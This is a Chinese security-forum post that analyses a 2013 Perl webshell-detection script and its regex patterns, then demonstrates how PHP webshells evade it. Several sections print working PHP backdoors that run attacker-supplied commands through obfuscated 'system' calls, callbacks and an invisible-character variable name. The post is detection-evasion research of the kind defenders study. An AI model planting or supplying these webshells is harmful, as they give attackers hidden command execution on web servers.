奇安信攻防社区-一场跨越十年的超时空思维碰撞

一场跨越十年的超时空思维碰撞

能想到，在十年后，在互联网的犄角旮旯里面，我还能重拾前人的经验、回忆和热枕，带着他们继续向前十年过去了，这位 `lakehu` 师傅，你还好吗？如果不是隐退江湖，想必也已成为一方大佬了吧，向各位推动中国网络安全发展的师傅致以崇高的敬意！

0# 概述
=====

最近反正也没啥事情干，突然看到朋友 `青山ya` 师傅审计出了腾讯开源的xSRC系统的逻辑漏洞，于是我就没事干，把开源的xSRC源码拉下来跟着审计了一波

![跨越十年-10.jpg](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-bbab6af6265ea8b477a6245cf849785e5d4ba964.jpg)

但在审计的过程中，我在[TSRC（腾讯安全应急响应中心）](https://security.tencent.com/)的在线平台中，看到了一个好玩的东西：

![跨越十年-1.png](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-69ba370e2b1c7e18198cafb4432de8ec8b66152e.png)

ScanWebshell：此工具可用于检测php Webshell

![跨越十年-2.png](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-84cf7586750d03fbe811b7d14d0c37c9045dd71f.png)

咦，我平时不也在研究WebShell的免杀吗？兴趣使然，我打算下载下来看看

1# 工具分析
=======

下载下来，是一个Perl语言编写的程序文件，可以在Linux系统上直接运行

![跨越十年-3.png](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-8ab11ae0962e32fd2946291a0feb234ac5364d0b.png)

通过编辑器打开，可以看到源码，作者看起来是想实现 `ASP` + `PHP` + `JSP` 的WebShell的查杀，但很可惜不知道是何种原因只完成了 `PHP` 的查杀部分，主体内容如下：

```perl
#!/usr/bin/perl
#Scan WebShell for LAKE2
#Desc: A small tools that find webshell with perl, it can check ASP/PHP/JSP/ASP.Net script, enjoy hacking :-)
#Author: lakehu[TSRC]
#Date: 2013-10-30
#Version: 1.1.1

#php webshell str
@php_code_array = (
  '\beval(\s|\/\*.*?\*\/)*$\s*.*?\s*$',
  '\bassert(\s|\/\*.*?\*\/)*$\s*.*?\s*$',
  '\bsystem(\s|\/\*.*?\*\/)*$\s*.*?\s*$',
  '\bpassthru(\s|\/\*.*?\*\/)*$\s*.*?\s*$',
  '\bexec(\s|\/\*.*?\*\/)*$\s*.*?\s*$',
  '\bpcntl_exec(\s|\/\*.*?\*\/)*$\s*.*?\s*$',
  '\bshell_exec(\s|\/\*.*?\*\/)*$\s*.*?\s*$',
  '\bpopen(\s|\/\*.*?\*\/)*$\s*.*?\s*$',
  '\bproc_open(\s|\/\*.*?\*\/)*$\s*.*?\s*$',
  '\bpreg_replace(\s|\/\*.*?\*\/)*$\s*.*?\s*$',
  '\bcreate_function(\s|\/\*.*?\*\/)*$\s*.*?\s*$',
  '\bob_start(\s|\/\*.*?\*\/)*$\s*.*?\s*$',
  '\barray_map(\s|\/\*.*?\*\/)*$\s*.*?\s*$',
  '`.*?`',
  '(include|include_once|require|require_once)(\s|\/\*.*?\*\/)*$\s*.*?\$.*?$',
  '(include|include_once|require|require_once)(\s|\/\*.*?\*\/)*$?\s*[\'"].*?\.[^p][^h][^p]\w*?[\'"].*?\s*?;',
  '(phpspy|4ngel|wofeiwo|c99shell|webshell|php_nst|reDuh)',
  '\$[\w-_\'\\[\\]{}\.\$\*/|]+(\s|\/\*.*?\*\/)*\(.*?$'
);
```

可以看到，这个脚本是腾讯安全的 `lakehu` 师傅在2013年完工的，今年是2023年  
整整十年时间，犹如弹指一挥间，没想到还有个人点开了他留下的赛博足迹

![跨越十年-5.png](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-56ca18a5c4c88eb9d43cad993859a0e4ee3257f8.png)

2# 这个脚本到底干了啥
============

第一次运行的时候，报了如下错误：

![跨越十年-4.png](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-00dac65e6a2ce947463b8d015b974a0d554705b0.png)

运行的时候，会有这个报错：`/usr/bin/perl^M: bad interpreter: No such file or directory`  
这是因为不同的编码方式导致，Windows环境下面新建的文本文档默认是dos格式的，dos格式在Linux系统里面有些的字符是不可见的，所以执行报错，解决方法如下：

```c
vim ./ScanWebShell.pl
:set ff        //显示文件格式 fileformat=dos
:set ff=unix   //修改格式为unix
:wq            //保存并退出
```

刚看到这个pl脚本，我只认为它就识别了常见的高危函数和可调用的高危函数，但随着深入上手和查看，它的余威还是有点震撼我的，这是脚本内提取出的正则匹配式：

```c
eval(\s|\/\*.*?\*\/)*$\s*.*?\s*$
assert(\s|\/\*.*?\*\/)*$\s*.*?\s*$
system(\s|\/\*.*?\*\/)*$\s*.*?\s*$
passthru(\s|\/\*.*?\*\/)*$\s*.*?\s*$
exec(\s|\/\*.*?\*\/)*$\s*.*?\s*$
pcntl_exec(\s|\/\*.*?\*\/)*$\s*.*?\s*$
shell_exec(\s|\/\*.*?\*\/)*$\s*.*?\s*$
popen(\s|\/\*.*?\*\/)*$\s*.*?\s*$
proc_open(\s|\/\*.*?\*\/)*$\s*.*?\s*$
preg_replace(\s|\/\*.*?\*\/)*$\s*.*?\s*$
create_function(\s|\/\*.*?\*\/)*$\s*.*?\s*$
ob_start(\s|\/\*.*?\*\/)*$\s*.*?\s*$
array_map(\s|\/\*.*?\*\/)*$\s*.*?\s*$
`.*?`
(include|include_once|require|require_once)(\s|\/\*.*?\*\/)*$\s*.*?\$.*?$
(include|include_once|require|require_once)(\s|\/\*.*?\*\/)*$?\s*[\'"].*?\.[^p][^h][^p]\w*?[\'"].*?\s*?;
(phpspy|4ngel|wofeiwo|c99shell|webshell|php_nst|reDuh)
$[\w-_\'\\[\\]{}\.\$\*/|]+(\s|\/\*.*?\*\/)*\(.*?$
```

首先，既然过滤了这么多高危函数，那我马上想到了我写的免杀手册的第一个实例，这里面可是一个高危函数都没有的：

```php
<?=~$_='$<>/'^'{{{{';@${$_}[_](@${$_}[__]);
```

如果不懂这个WebShell的原理，可以看开源项目的12.1部分：<https://github.com/AabyssZG/WebShell-Bypass-Guide/blob/main/PHP-Webshell-ByPass-Guide.md>

![跨越十年-6.png](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-15312f7b1d15e0370c1f1a1b1085d074f65120a7.png)

没想到第一个WebShell就翻车了，这时候的我心理活动：咦不应该啊？  
然后我又把整个正则匹配式看了一遍，找到了关键的正则匹配式：

```perl
'\$[\w-_\'\\[\\]{}\.\$\*/|]+(\s|\/\*.*?\*\/)*$.*?$'
```

这个正则表达式要怎么理解呢，我们可以拆开用以下四部分来分析：

```perl
\$                         # 第一部分
[\w-_\'\\[\\]{}\.\$\*/|]+  # 第二部分
(\s|\/\*.*?\*\/)*          # 第三部分
$.*?$                    # 第四部分
```

- 第一部分: 最开头匹配符号 `$`
- 第二部分：匹配一个或多个字符，这些字符可以是：字母数字下划线、单引号、反斜杠、方括号、花括号、点、`$`符号、星号、斜杠、竖线
- 第三部分: 匹配零个或多个空白字符（\\s）或注释（/ / 形式的内容）。
- 第四部分: 用非贪婪模式匹配括号内的任意字符

那现在，让我们将这些部分组合起来，可以清楚地理解整个正则表达式的匹配内容：

- 第一部分: 匹配以 `$` 符号开头的单词（变量名）
- 第二部分: 匹配一个或多个允许的字符，形成变量名的其余部分，比如 `$f` 或者 `$_`
- 第三部分: 匹配零个或多个空白字符或注释，应该是防止中间掺杂垃圾字符干扰正则
- 第四部分: 匹配括号内的任意字符，相当于不检测括号内的内容

**相当于检测到外部变量想要作为函数执行括号内的内容就拦截，那这条正则匹配式能拦截啥呢？比如：**

![跨越十年-7.png](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-588316eb84360d93e408782319a78f4337388322.png)

一、自定义函数混淆字符串类型：

```php
function confusion($a){
    $s = ['A','a','b', 'y', 's', 's', 'T', 'e', 'a', 'm'];
    $tmp = "";
    while ($a>10) {
        $tmp .= $s[$a%10];
        $a = $a/10;
    }
    return $tmp.$s[$a];
}
$f = confusion(976534);         //sysTem（高危函数）
$f($_POST['aabyss']);           //sysTem($_POST['aabyss']);
```

二、一维数组绕过：

```php
$f = substr_replace("systxx","em",4);         //system（高危函数）
$z = array($array = array('a'=>$f($_GET['aabyss'])));
var_dump($z);
```

三、异或+变换参数绕过：

```php
$_='$<>/'^'{{{{';@${$_}[_](@${$_}[__]);
```

等等，还有许多以 `变量(调用外部参数)` 来执行恶意命令的WebShell都能查杀，说明作者对参数变形和PHP参数调用的相关姿势烂熟于心啊哈哈

3# 查杀ByPass
===========

既然直接用变量作为函数执行不行的话，那可以曲线救国，比如：

```php
//ASCII编码解密后为system高危函数
$f =  chr(114+1).chr(120+1).chr(116-1).chr(117-1).chr(100+1).chr(108+1);
call_user_func_array($f, array($_GET['aabyss']));
```

通过这个简单的样例，采用回调函数的手法，来执行对应的命令

![跨越十年-8.png](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-9871c985e2cc2f3a4e139638be332dc7914feffe.png)

成功ByPass：

![跨越十年-9.png](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-ef2e7dd357d6b99c00cedd1a1c113f549735d761.png)

同样，基于这种思路，还可以用更多手法来绕过这些正则表达式

4# 关于课后作业
=========

这篇文章发表后，在公众号上迅速传播，我真没想到能得到lake2师傅的回应，也没想到师傅居然是前腾讯安全平台部总监?

**《我很好，谢谢》：[https://mp.weixin.qq.com/s/l1gt6Wf\_yZg-dHeyBmA7Dw](https://mp.weixin.qq.com/s/l1gt6Wf_yZg-dHeyBmA7Dw)**

在文中，大佬也给我留下了课后作业：

![课后作业-1.png](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-59cb59f19aa7982d22b4218ab06be9b19419bffe.png)

那意味着有以下限制条件：

- 不能使用任何高危函数
- 不能使用任何回调函数
- 在满足以上两个条件的情况下，能绕过 `\$[\w-_\'\\[\\]{}\.\$\*/|]+(\s|\/\*.*?\*\/)*$.*?$` 这个正则表达式

这个限制条件看似简单，实则细细研究后，还是挺让人伤脑筋的

因为正常情况下，比如我将高危函数名传给变量（因为高危函数都被禁用了）：

```php
$f = ('.$.48]' ^ ']]]@]0');  //通过异或运算，让$f = system
```

当我们要调用 `$f` 执行高危命令的时候，结构如下：

```php
$f($_POST['aabyss']);
$f(calc);
$f(whoami);
```

观察发现，拐来拐去最终还是 `$f()` 的一个结构，而这个结构，恰恰是 `\$[\w-_\'\\[\\]{}\.\$\*/|]+(\s|\/\*.*?\*\/)*$.*?$` 这个正则表达式识别和匹配的结构

![跨越十年-7.png](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-9f5c71263a81d36b58b37ab4fc4575e575e127ff.png)

那我们该怎么绕过呢？这个时候我发现，正则表达式在匹配 `$f()` 的 `$f` 前头的这个变量的时候，使用的是 `[\w-_\'\\[\\]{}\.\$\*/|]+`，那我能不能使用不可见字符绕过呢？

说干就干，我写了以下demo：

```php
header('HTTP/1.1 404');
class Aabyss{
    public $c='';
    function __destruct(){
        $ = ('.$.48]' ^ ']]]@]0');   //通过异或运算，得到高危函数system
    return $($this->c);
    }
}
$runrun=new Aabyss();
@$runrun->c=$_POST['zg'];
```

传参后，成功执行 `calc` 弹出计算器：

![课后作业-2.png](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-78d613c4e7572cd87a77222864f6ee018b54164a.png)

绕过正则表达式的匹配，成功ByPass：

![课后作业-3.png](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-c05e1d6e5a625f8271c18be58b5e067390e0f657.png)

背后原理：在早期PHP版本（版本号 &lt; `7.1.9`）当中，不可见字符串是允许作为变量所存在的，那我可以通过十六进制编辑器，将变量改为不可见字符串即可：

![课后作业-4.png](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-cb4dcfaf54b706f02ff65f5e7ef5846328e5c545.png)

![课后作业-5.png](https://shs3.b.qianxin.com/attack_forum/2023/11/attach-a697094f927772d0c7ffbfcd8d7b98c5f14087ee.png)

从而根据PHP的语法结构，成功绕过了该正则表达式，实现了ByPass

5# 总结
=====

2013年那个时代，正是国内网络安全行业刚刚扬帆起航的时代  
可以看到，在那个还在用着 `D盾` 和 `菜刀caidao` 的时代，对于WebShell的查杀还是基于正则匹配式，回想现在的 `语义分析（AST）`、`机器学习（AI）` 来对WebShell进行查杀，不可谓时代的车轮仍在滚滚向前

谁能想到，在十年后，在互联网的犄角旮旯里面，我还能重拾前人的经验、回忆和热枕，带着他们继续向前

十年过去了，这位 `lakehu` 师傅，你还好吗？如果不是隐退江湖，想必也已成为一方大佬了吧，向各位推动中国网络安全发展的师傅致以崇高的敬意！

- - - - - -

后续有师傅回复我了，找到了这位 `lakehu` 师傅的后续，还真是大佬，可以看链接：<https://zhuanlan.zhihu.com/p/100400881>

发表于 2023-12-06 09:00:02
阅读 ( 6068 )
分类：安全开发

一场跨越十年的超时空思维碰撞

0 条评论